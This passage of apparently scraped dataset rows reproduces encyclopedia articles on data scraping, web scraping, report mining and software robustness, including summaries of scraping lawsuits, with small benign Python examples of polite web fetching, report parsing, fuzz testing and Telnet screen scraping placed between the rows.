16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot; common techniques include blocking IP addresses, rate limiting, requiring CAPTCHAs, and declaring off-limits areas in a robots.txt file. |
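From the scraper's side, two of the measures mentioned above, robots.txt exclusions and rate limiting, can be respected with the standard library's urllib.robotparser plus a simple sleep between requests. This is only a sketch: the user-agent string, the one-second fallback delay, and the example paths are assumptions, not values taken from any particular site.

import time
import urllib.robotparser
from urllib.parse import urljoin
import requests

def polite_fetch(base_url, paths, user_agent="example-research-bot"):
    # Honour the site's robots.txt exclusions and any declared crawl delay
    robots = urllib.robotparser.RobotFileParser()
    robots.set_url(urljoin(base_url, "/robots.txt"))
    robots.read()
    delay = robots.crawl_delay(user_agent) or 1.0  # fall back to 1 s between requests

    pages = {}
    for path in paths:
        url = urljoin(base_url, path)
        if not robots.can_fetch(user_agent, url):
            print("Skipping disallowed URL:", url)
            continue
        response = requests.get(url, headers={"User-Agent": user_agent}, timeout=10)
        if response.status_code == 200:
            pages[url] = response.text
        time.sleep(delay)  # simple rate limiting so the server is not overloaded
    return pages

# Example with a placeholder site: polite_fetch("https://example.com", ["/", "/about"])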
46 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Further_reading | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
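As a toy illustration of the report mining described in this row, the sketch below parses a fixed-width text report of the kind a legacy system might write to a spool file and loads the detail lines into a pandas DataFrame (pandas is installed at the top of this notebook). The report layout and column positions are invented for the example.

import pandas as pd

# A made-up spool-file excerpt with a fixed-width layout (columns are illustrative)
REPORT = """\
DAILY SALES REPORT            PAGE 1
ITEM        QTY      AMOUNT
Widget A     12      120.00
Widget B      3       45.50
TOTAL        15      165.50
"""

def mine_report(text):
    rows = []
    for line in text.splitlines():
        # Skip headers, footers, and totals; keep only the detail lines
        if not line[:12].strip() or line.startswith(("DAILY", "ITEM", "TOTAL")):
            continue
        rows.append({
            "item": line[0:12].strip(),
            "qty": int(line[12:17]),
            "amount": float(line[17:29]),
        })
    return pd.DataFrame(rows)

print(mine_report(REPORT))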
47 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Robustness_(computer_science) | In computer science, robustness is the ability of a computer system to cope with errors during execution 1 2 and cope with erroneous input. 2 Robustness can encompass many areas of computer science, such as robust programming, robust machine learning, and Robust Security Network. Formal techniques, such as fuzz testing, are essential to showing robustness since this type of testing involves invalid or unexpected inputs. Alternatively, fault injection can be used to test robustness. Various commercial products perform robustness testing of software analysis. 3 In general, building robust systems that encompass every point of possible failure is difficult because of the vast quantity of possible inputs and input combinations. 4 Since all inputs and input combinations would require too much time to test, developers cannot run through all cases exhaustively. Instead, the developer will try to generalize such cases. 5 For example, imagine inputting some integer values. Some selected inputs might consist of a negative number, zero, and a positive number. When using these numbers to test software in this way, the developer generalizes the set of all reals into three numbers. This is a more efficient and manageable method, but more prone to failure. Generalizing test cases is an example of just one technique to deal with failure—specifically, failure due to invalid user input. Systems generally may also fail due to other reasons as well, such as disconnecting from a network. Regardless, complex systems should still handle any errors encountered gracefully. There are many examples of such successful systems. Some of the most robust systems are evolvable and can be easily adapted to new situations. 4 Programs and software are tools focused on a very specific task, and thus are not generalized and flexible. 4 However, observations in systems such as the internet or biological systems demonstrate adaptation to their environments. One of the ways biological systems adapt to environments is through the use of redundancy. 4 Many organs are redundant in humans. The kidney is one such example. Humans generally only need one kidney, but having a second kidney allows room for failure. This same principle may be taken to apply to software, but there are some challenges. When applying the principle of redundancy to computer science, blindly adding code is not suggested. 
Blindly adding code introduces more errors, makes the system more complex, and renders it harder to understand. 6 Code that does not provide any reinforcement to the already existing code is unwanted. The new code must instead possess equivalent functionality, so that if a function is broken, another providing the same function can replace it, using manual or automated software diversity. To do so, the new code must know how and when to accommodate the failure point. 4 This means more logic needs to be added to the system. But as a system adds more logic and components and increases in size, it becomes more complex. Thus, when making a more redundant system, the system also becomes more complex and developers must consider balancing redundancy with complexity. Currently, computer science practices do not focus on building robust systems. 4 Rather, they tend to focus on scalability and efficiency. One of the main reasons why there is no focus on robustness today is because it is hard to do in a general way. 4 Robust programming is a style of programming that focuses on handling unexpected termination and unexpected actions. 7 It requires code to handle these terminations and actions gracefully by displaying accurate and unambiguous error messages. These error messages allow the user to more easily debug the program. Robust machine learning typically refers to the robustness of machine learning algorithms. For a machine learning algorithm to be considered robust, either the testing error has to be consistent with the training error, or the performance has to be stable after adding some noise to the dataset. 8 Recently, consistent with their rise in popularity, there has been increasing interest in the robustness of neural networks. This is particularly due to their vulnerability to adversarial attacks. 9 Robust network design is the study of network design in the face of variable or uncertain demands. 10 In a sense, robustness in network design is broad just like robustness in software design because of the vast possibilities of changes or inputs. There exist algorithms that tolerate errors in the input. 11 |
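The robust programming and fuzz testing ideas mentioned in this row can be sketched in a few lines of Python: a small parser that rejects unexpected input with a clear error message, plus a fuzz-style loop that feeds it random, mostly invalid, strings and checks that it never fails in an uncontrolled way. The function and its port-number domain are made up purely for illustration.

import random
import string

def parse_port(value):
    # Robust programming: validate unexpected input and fail with a clear message
    try:
        port = int(value)
    except (TypeError, ValueError):
        raise ValueError(f"expected an integer port number, got {value!r}")
    if not 1 <= port <= 65535:
        raise ValueError(f"port {port} is outside the valid range 1-65535")
    return port

def fuzz_parse_port(trials=1000, seed=0):
    # Fuzz-style test: feed random, often invalid, inputs and check that the
    # function either returns a valid port or raises ValueError, never an
    # unexpected exception type.
    rng = random.Random(seed)
    for _ in range(trials):
        candidate = "".join(rng.choices(string.printable, k=rng.randint(0, 8)))
        try:
            port = parse_port(candidate)
            assert 1 <= port <= 65535
        except ValueError:
            pass  # rejected gracefully, which is the desired behaviour

fuzz_parse_port()
print("fuzz test finished without unexpected exceptions")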
48 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-8 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
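A minimal sketch of the Telnet-based screen scraper described in this row is given below, using Python's legacy telnetlib module (deprecated since Python 3.11 and removed in 3.13, so an older interpreter or a third-party Telnet client would be needed). The host name, login prompts, menu keystrokes and record layout are all hypothetical.

import telnetlib  # legacy stdlib module; deprecated in Python 3.11, removed in 3.13

def scrape_legacy_screen(host, port=23, user=b"guest", password=b"guest"):
    # "Pretend" to be a user at a terminal: log in, send the keystrokes the
    # old menu expects, then capture the text the application paints on screen.
    with telnetlib.Telnet(host, port, timeout=10) as tn:
        tn.read_until(b"login: ", timeout=5)
        tn.write(user + b"\n")
        tn.read_until(b"Password: ", timeout=5)
        tn.write(password + b"\n")
        tn.write(b"3\n")  # hypothetical menu option that prints the report
        screen = tn.read_until(b"END OF REPORT", timeout=10).decode("ascii", "replace")

    # Extract the desired fields from the captured display output
    records = []
    for line in screen.splitlines():
        if line.startswith("ACCT "):  # hypothetical record marker
            records.append({"account": line[5:15].strip(),
                            "balance": line[15:27].strip()})
    return records

# Example with a placeholder host: scrape_legacy_screen("legacy.example.com")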
49 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-2 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
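The DOM-tree and XPath approach mentioned above can be sketched with the third-party lxml package together with requests; lxml is an assumption here, since it is not installed in the setup cell of this notebook, and the URL is a placeholder.

from lxml import html  # assumes the lxml package is installed (pip install lxml)
import requests

def extract_with_xpath(url):
    # Fetch the page and parse it into a DOM tree
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    tree = html.fromstring(response.content)

    # XPath expressions address parts of the tree directly
    headings = [h.text_content().strip() for h in tree.xpath("//h1 | //h2")]
    links = tree.xpath("//a/@href")
    return headings, links

# Example with a placeholder URL: extract_with_xpath("https://example.com")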
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" to Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter, blocked their IP addresses, and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 Until the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200–300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider it in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of 